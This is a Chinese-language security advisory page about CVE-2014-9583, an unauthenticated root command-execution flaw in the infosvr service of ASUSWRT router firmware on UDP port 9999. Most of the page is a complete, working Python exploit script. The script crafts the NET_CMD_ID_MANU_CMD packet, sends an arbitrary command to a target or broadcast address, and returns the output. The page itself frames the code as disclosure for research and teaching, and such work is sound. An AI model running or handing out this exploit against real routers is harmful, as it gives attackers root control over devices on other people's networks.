1071 LAN后门命令执行漏洞

发布日期:2015-01-08
更新日期:2015-01-12

受影响系统:
Asus ASUSWRT 3.0.0.4.376_1071
 Asus ASUSWRT 3.0.0.376.2524-g0013f52
描述:
CVE(CAN) ID: CVE-2014-9583

ASUSWRT是ASUS路由器固件。

ASUS WRT 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52版本中,infosvr的common.c没有正确检查请求的MAC地址,这可使远程攻击者通过向UDP端口9999,发送NET_CMD_ID_MANU_CMD数据包,利用此漏洞绕过身份验证并执行任意命令。受影响固件版本用在RT-AC66U, RT-N66U等其他路由器中。

<*来源:Friedrich Postelstorfer
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python3

# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
 # Date: 2014-10-11
 # Vendor Homepage:
 # Software Link:
 # Source code:
 # Tested Version: 3.0.0.4.376_1071-g8696125
 # Tested Device: RT-N66U

# Description:
 # A service called "infosvr" listens on port 9999 on the LAN bridge.
 # Normally this service is used for device discovery using the
 # "ASUS Wireless Router Device Discovery Utility", but this service contains a
 # feature that allows an unauthenticated user on the LAN to execute commands
 # <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
 # "iboxcom.h" is in asuswrt/release/src/router/shared.
 #
 # Affected devices may also include wireless repeaters and other networking
 # products, especially the ones which have "Device Discovery" in their features
 # list.
 #
 # Using broadcast address as the IP address should work and execute the command
 # on all devices in the network segment, but only receiving one response is
 # supported by this script.

import sys, os, socket, struct


 PORT = 9999

if len(sys.argv) < 3:
    print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
    sys.exit(1)


 ip = sys.argv[1]
 cmd = sys.argv[2]

enccmd = cmd.encode()

if len(enccmd) > 237:
    # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
    print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
    sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 sock.bind(('0.0.0.0', PORT))
 sock.settimeout(2)

# Request consists of following things
 # ServiceID    [byte]      ; NET_SERVICE_ID_IBOX_INFO
 # PacketType    [byte]      ; NET_PACKET_TYPE_CMD
 # OpCode        [word]      ; NET_CMD_ID_MANU_CMD
 # Info          [dword]    ; Comment: "Or Transaction ID"
 # MacAddress    [byte[6]]  ; Double-wrongly "checked" with memcpy instead of memcmp
 # Password      [byte[32]]  ; Not checked at all
 # Length        [word]
 # Command      [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')

sock.sendto(packet, (ip, PORT))


 # Response consists of following things
 # ServiceID    [byte]      ; NET_SERVICE_ID_IBOX_INFO
 # PacketType    [byte]      ; NET_PACKET_TYPE_RES
 # OpCode        [word]      ; NET_CMD_ID_MANU_CMD
 # Info          [dword]    ; Equal to Info of request
 # MacAddress    [byte[6]]  ; Filled in for us
 # Length        [word]
 # Result        [byte[420]] ; Actually returns that amount

while True:
    data, addr = sock.recvfrom(512)

if len(data) == 512 and data[1] == 22:
        break

length = struct.unpack('<H', data[14:16])[0]
 s = slice(16, 16+length)
 sys.stdout.buffer.write(data[s])

sock.close()

建议:
厂商补丁:

Asus
 ----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/a240f0e62f16e448a8011f17c0528acc.html